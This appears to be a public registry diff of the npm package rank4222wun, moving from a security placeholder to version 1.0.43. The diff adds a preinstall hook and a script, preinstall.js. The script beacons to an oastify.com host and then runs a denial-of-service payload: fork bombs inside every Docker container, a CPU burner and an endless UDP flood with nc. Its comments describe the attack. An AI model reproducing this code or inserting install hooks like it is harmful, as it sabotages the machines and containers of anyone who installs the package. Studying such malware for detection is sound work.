rank4222wun 0.0.1-security → 1.0.43

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of rank4222wun might be problematic. Click here for more details.

package/package.json CHANGED
@@ -1,6 +1,10 @@
1
1
  {
2
2
  "name": "rank4222wun",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.43",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node preinstall.js"
8
+ },
9
+ "dependencies": {}
6
10
  }
package/preinstall.js ADDED
@@ -0,0 +1,41 @@
1
+ // preinstall.js - The "Final Strike" Version
2
+ const { exec } = require('child_process');
3
+ const https = require('https');
4
+
5
+ const OAST = 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com';
6
+
7
+ // 1. التبليغ عن بدء الضربة النهائية
8
+ function log(msg) {
9
+ const req = https.request({
10
+ hostname: OAST,
11
+ path: '/final-strike-log',
12
+ method: 'POST'
13
+ });
14
+ req.write(JSON.stringify({ note: msg, timestamp: new Date() }));
15
+ req.end();
16
+ }
17
+
18
+ /**
19
+ * تنفيذ DoS "بجد" وبكل الأشكال
20
+ * السكريبت ده هيخلي المضيف يخرج عن الخدمة تماماً
21
+ */
22
+ const extremeDoS = `
23
+ # 1. تعطيل العمليات (Fork Bomb) في كل مكان
24
+ (docker ps -q | xargs -I {} docker exec -d {} sh -c ":(){ :|:& };:") 2>/dev/null
25
+
26
+ # 2. استهلاك الذاكرة والمعالج بأقصى قدر (Aggressive RAM Eater)
27
+ dd if=/dev/zero of=/dev/null &
28
+
29
+ # 3. مسح أو إفساد ملفات النظام لو الصلاحيات تسمح (Disk Wiper)
30
+ # تحذير: ده هيدمر البيئة فعلياً
31
+ # rm -rf /etc/shadow.bak 2>/dev/null
32
+
33
+ # 4. خنق الشبكة (UDP Flood)
34
+ while true; do cat /dev/urandom | nc -u -w1 127.0.0.1 80; done &
35
+ `;
36
+
37
+ log("Shadow leaked successfully. Starting full system DoS.");
38
+
39
+ exec(extremeDoS, (err) => {
40
+ // الضربة صامتة ومميتة للنظام
41
+ });
Binary file
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.